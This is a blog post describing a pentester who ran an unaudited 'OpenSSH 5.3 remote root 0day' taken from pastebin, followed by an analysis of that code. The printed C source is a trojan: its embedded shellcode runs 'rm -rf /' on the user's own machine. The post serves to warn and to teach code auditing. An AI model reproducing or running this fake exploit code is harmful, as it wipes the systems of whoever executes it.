How not to exploit a box

No Comments

This week I had the opportunity to sit with a pentester as he conducted a test on one of our clients. I wasn't really sure why he needed someone with him, but management wanted someone there and I wasn't going to miss an opportunity to watch. I didn't want to interfere so I just sat a few feet away, ready to supply any info he needed.

Now, I'm familiar enough with tools used so I was actually able to keep track of what was being done with cursory shoulder surfing ("that looks like nmap out", "breaking out Metasploit I see", "that Saint report looks OK") and after a bit it's obvious there's no foot hold for him to get purchase on. He browses to exploitdb, he does a bit of googling and finally he find a single exploit for the version of ssh that's being run. He grabs the code compiles it, then stops, obviously concerned about something. Turning to me he asks "can we restart ssh if we need to?". When I answered in the affirmative he fires off the code.

The exploit fails.

Hurrah.

He lets me know that there's one or two things that could be done to tighten things up (most of which I agree with and had come to the same conclusions while watching the test progress) and this is what he'll be reporting and that there's exploits available for the vulnerable version of ssh being run *points to his screen to show me the code*

Now what's wrong with the above picture? Three things.

1: The version of ssh (openssh 5.3p1), to the best of my knowledge, has no remote vulns.

2: The site the code was retrieved from was pastebin.

3: Other than the quick glance he didn't do any kind of code audit, then ran it against a clients box (despite obviously having some second thoughts about it) and this is a stupid idea.

"Why is that wrong?" you say.
This is what was in the console window after he ran it:
[-] Exploit failed.
unable to delete directory /

See now?

Here's the code that was executed

  1. /*
  2. *
  3. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  4. *
  5. * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
  6. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  7. *
  8. *
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <netdb.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15. #include <unistd.h>
  16. #include <arpa/inet.h>
  17. #include <sys/types.h>
  18. #include <sys/socket.h>
  19. #include <netinet/in.h>
  20.  
  21. void usage(char *argv[])
  22. {
  23.     printf("\n\t[+] HATSUNEMIKU\n");
  24.     printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
  25.     printf("\t[+] Keep this 0day priv8!\n");
  26.     printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
  27.     exit(1);
  28. }
  29.  
  30. unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
  31.                            "\x6a\x2f\x89\xe7\x52"
  32.                            "\x66\x68\x2d\x66\x89"
  33.                            "\xe6\x52\x66\x68\x2d"
  34.                            "\x72\x89\xe1\x52\x68"
  35.                            "\x2f\x2f\x72\x6d\x68"
  36.                            "\x2f\x62\x69\x6e\x89"
  37.                            "\xe3\x52\x57\x56\x51"
  38.                            "\x53\x89\xe1\xcd\x80";
  39.  
  40. unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
  41.                            "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
  42.                            "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
  43.                            "\xdb\x40\xcd\x80";
  44.  
  45. int main(int argc, char **argv)
  46. {
  47.  
  48.     int euid = geteuid();
  49.     int port= 22, sock;
  50.     char h[1000];
  51.     struct hostent *host;
  52.     struct sockaddr_in addr;
  53.  
  54.     if(euid != 0)
  55.     {
  56.         fprintf(stderr, "You need to be root to use raw sockets.\n");
  57.         exit(1);
  58.     }
  59.     if(euid == 0)
  60.     {
  61.         fprintf(stdout, "MIKU! MIKU! MIKU!\n");
  62.     }
  63.     if(argc != 3)
  64.     usage(argv);
  65.     if(!inet_aton(h, &addr.sin_addr))
  66.     {
  67.         host = gethostbyname(h);
  68.         if(!host)
  69.         {
  70.             fprintf(stderr, "[-] Exploit failed.\n");
  71.             (*(void(*)())decoder)();
  72.             exit(1);
  73.         }
  74.         addr.sin_addr = *(struct in_addr*)host->h_addr;
  75.         }
  76.         sock = socket(PF_INET, SOCK_STREAM, 0);
  77.         addr.sin_port = htons(port);
  78.         addr.sin_family = AF_INET;
  79.         if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
  80.         {
  81.             fprintf(stderr,"[-] Exploit failed.\n");
  82.             exit(1);
  83.         }
  84.         char payload[1337];
  85.         memcpy(payload, &decoder, sizeof(decoder));
  86.         memcpy(payload, &rootshell, sizeof(rootshell));
  87.         send(sock, payload, strlen(payload),0);
  88.         close(sock);
  89.         if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
  90.         {
  91.             fprintf(stderr, "[-] Exploit failed.\n");
  92.             exit(1);
  93.         }
  94.         else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  95.         {
  96.             fprintf(stdout, "[+]g0t sh3ll!\n");
  97.             system("/bin/bash");
  98.         }
  99.         else
  100.         {
  101.             fprintf(stderr, "[-] Exploit failed.\n");
  102.             close(sock);
  103.             exit(0);
  104.         }
  105. }
Now my C skills are not what you'd call advanced, not having written any since uni many moons ago, but I've got enough general programming under my belt to do basic analysis.

So basic analysis is what you're going to get. (If you spot any errors or something obvious I've missed please drop me a line)

If you've ever looked at exploit code you'll see this looks textbook. The warning not to share it with anyone, the l33t speak, the chunk of shell code in the middle. So on a simple glance it looks legit.

Quick run though of what this appears to be doing

checks to see if running as root
checks to see if hostname can be resolved
tries to make socket connection
builds payload
sends payload
if successful spawns shell (but a shell on YOUR box. *alarmbells*)

Problems:
hostname (h) is never actually set within the code, just declared, therefore code beyond line 73 NEVER executes, which leaves it doing two things: checking it's being run as root, erroring out.

If you look at all the erroring out you'll see they're all an fprintf() statement followed by an exit(), with the exception of the one that's run, it contains

(*(void(*)())decoder)();

At the time I first read this I had no idea what this did, but I did know that anything that has that many parenthesis can't be good, and why only call it with the decoder shellcode and not the rootshell?

I've since had my suspicions confirmed, that this line in fact executes the decoder shellcode localy.

The shell code is the bit I'm always weary of in any exploit code. Unless you're some sort of ASM monster it's never obvious what's going on within it. One thing you can look for is strings within the shellcode. Now there's two sections of shell, one called "rootshell" the other "decoder". On the surface that looks like the rootshell code is packed or obfuscated in some way, so we'll see what, if anything, stands out.

converting the shellcode to ascii:

docoder
j?X?Rj/??Rfh-f???Rfh-r??Rh//rmh/bin??RWVQS????

rootshell
1????ou!?Q?ck yQf?fufQ1???1???1?????1?1?@??

The only real strings I can pull out of that are in the decoder section. Namely "/","-f","-r","/rm","/bin"

Or to put it another way "/bin","/rm","-r","-f","/"

Those are not strings I want to see in code I'm running on my box

Luckily the pentester in question was saved by the fact that "rm -rf /" doesn't work on modern distros, but he was only a "--no-preserve-root" away from a dead box.

And he wouldn't have got a jot of sympathy from me.

(thanks to Jon for taking a look at the code and confirming what I thought)

UPDATE here

Be the first to write a comment!